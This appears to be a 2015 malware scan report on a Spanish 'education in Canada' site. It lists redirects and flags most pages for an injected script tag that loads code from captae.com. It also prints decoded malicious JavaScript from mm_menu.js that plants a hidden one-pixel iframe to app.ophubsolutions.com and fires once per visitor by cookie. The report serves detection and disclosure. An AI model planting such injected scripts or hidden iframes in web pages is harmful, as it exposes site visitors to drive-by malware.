Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=educacionencanada.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://educacionencanada.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:06:56 GMT Location: http://www.educationincanada.es/ Server: Apache Vary: Accept-Encoding Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.educationincanada.es/ | 200 OK Content-Length: 9262 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377761"></script> | ||
http://www.educationincanada.es/mm_menu.js | 200 OK Content-Length: 33250 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Menu(label, mw, mh, fnt, fs, fclr, fhclr, bg, bgh, halgn, valgn, pad, space, to, sx, sy, srel, opq, vert, idt, aw, ah) { this.version = "020320 [Menu; mm_menu.js]"; this.type = "Menu"; this.menuWidth = mw; this.menuItemHeight = mh; this.fontSize = fs; this.fontWeight = "plain"; this.fontFamily = fnt; this.fontColor = fclr; this.fontColorHilite = fhclr; this.bgColor = "#555555"; this.menuBorder = 1; this.menuBgOpaque=opq; Decoded script: String String function zzzfff() { var dlf = document.createElement('iframe'); dlf.src = 'http://app.ophubsolutions.com/prWMHCJV.php'; dlf.style.position = 'absolute'; dlf.style.border = '0'; dlf.style.height = '1px'; dlf.style.width = '1px'; dlf.style.left = '1px'; dlf.style.top = '1px'; if (!document.getElementById('dlf')) { document.write('<div id=\'dlf\'></div>'); document.getElementById('d ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://educacionencanada.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:06:58 GMT Location: http://www.educationincanada.es/index.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.educationincanada.es/index.html | 200 OK Content-Length: 9262 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377761"></script> | ||
http://www.educationincanada.es/intro.html | 200 OK Content-Length: 11162 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377793"></script> | ||
http://www.educationincanada.es/estructura.html | 200 OK Content-Length: 12716 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377788"></script> | ||
http://www.educationincanada.es/centros_participantes.html | 200 OK Content-Length: 8686 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377777"></script> | ||
http://www.educationincanada.es/conv.html | 200 OK Content-Length: 23406 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377781"></script> | ||
http://www.educationincanada.es/faqs.html | 200 OK Content-Length: 9973 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377789"></script> | ||
http://www.educationincanada.es/links.html | 200 OK Content-Length: 9976 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://captae.com/wp-content/themes/Web_Explorer_wp/vPY78hQG.php?id=15377796"></script> | ||
http://www.educationincanada.es/www.educationincanada.es | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://www.educationincanada.es/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://educacionencanada.com/estructura.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/estructura.html Server: Apache Vary: Accept-Encoding Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/centros_participantes.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/centros_participantes.html Server: Apache Vary: Accept-Encoding Content-Length: 266 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/conv.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/conv.html Server: Apache Vary: Accept-Encoding Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/faqs.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/faqs.html Server: Apache Vary: Accept-Encoding Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/links.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/links.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/www.educationincanada.es | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:01 GMT Location: http://www.educationincanada.es/www.educationincanada.es Server: Apache Vary: Accept-Encoding Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 | clean |
http://educacionencanada.com/intro.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:07:02 GMT Location: http://www.educationincanada.es/intro.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: educacionencanada.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 09:06:56 GMT
Location: http://www.educationincanada.es/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
GET / HTTP/1.1
Host: educacionencanada.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 09:06:56 GMT
Location: http://www.educationincanada.es/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: educacionencanada.com
Referer: http://www.google.com/search?q=educacionencanada.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: educacionencanada.com
Referer: http://www.google.com/search?q=educacionencanada.com
Result:
The result is similar to the first query. There are no suspicious redirects found.